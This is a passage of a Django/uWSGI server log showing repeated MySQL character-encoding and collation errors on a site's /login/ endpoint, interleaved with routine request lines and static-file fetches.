"/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 641/786] 114.87.230.234 () {48 vars in 1116 bytes} [Thu Jan 14 08:04:30 2021] POST /login/ => generated 209897 bytes in 110 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Not Found: / +[pid: 2069|app: 0|req: 642/787] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 08:04:55 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 233, in login + if len(models.User.objects.filter(uid=uid, password=pwd)) != 0: + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") +[pid: 2069|app: 0|req: 643/788] 114.87.230.234 () {48 vars in 1116 bytes} [Thu Jan 14 08:04:56 2021] POST /login/ => generated 183560 bytes in 127 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Not Found: /login. +[pid: 2069|app: 0|req: 644/789] 219.228.146.246 () {38 vars in 823 bytes} [Thu Jan 14 08:04:57 2021] GET /login. => generated 3465 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 645/790] 219.228.146.246 () {38 vars in 823 bytes} [Thu Jan 14 08:05:20 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 646/791] 219.228.146.253 () {48 vars in 1009 bytes} [Thu Jan 14 08:05:25 2021] POST /login/ => generated 209925 bytes in 108 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 647/792] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:05:31 2021] POST /login/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 324 bytes (2 switches on core 0) +[pid: 2069|app: 0|req: 648/793] 219.228.146.246 () {40 vars in 871 bytes} [Thu Jan 14 08:05:31 2021] GET /home/ => generated 7488 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 649/794] 219.228.146.253 () {38 vars in 826 bytes} [Thu Jan 14 08:05:32 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: -1|req: -1/795] 219.228.146.253 () {40 vars in 815 bytes} [Thu Jan 14 08:05:32 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/796] 219.228.146.253 () {40 vars in 837 bytes} [Thu Jan 14 08:05:32 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/797] 219.228.146.253 () {40 vars in 819 bytes} [Thu Jan 14 08:05:32 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/798] 219.228.146.253 () {40 vars in 817 bytes} [Thu Jan 14 08:05:32 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/799] 219.228.146.253 () {40 vars in 823 bytes} [Thu Jan 14 08:05:32 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/800] 219.228.146.253 () {40 vars in 798 bytes} [Thu Jan 14 08:05:32 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/801] 219.228.146.253 () {40 vars in 814 bytes} [Thu Jan 14 08:05:32 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/802] 219.228.146.253 () {40 vars in 804 bytes} [Thu Jan 14 08:05:32 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/803] 219.228.146.253 () {40 vars in 796 bytes} [Thu Jan 14 08:05:32 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/804] 219.228.146.253 () {40 vars in 812 bytes} [Thu Jan 14 08:05:32 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/805] 219.228.146.253 () {40 vars in 869 bytes} [Thu Jan 14 08:05:32 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: 0|req: 650/806] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:05:41 2021] POST /login/ => generated 27 bytes in 22 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 651/807] 219.228.146.246 () {40 vars in 871 bytes} [Thu Jan 14 08:05:41 2021] GET /home/ => generated 7487 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 652/808] 219.228.146.253 () {48 vars in 960 bytes} [Thu Jan 14 08:05:49 2021] POST /login/ => generated 209584 bytes in 127 msecs (HTTP/1.1 500) 7 headers in 286 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 653/809] 219.228.146.253 () {40 vars in 814 bytes} [Thu Jan 14 08:06:07 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 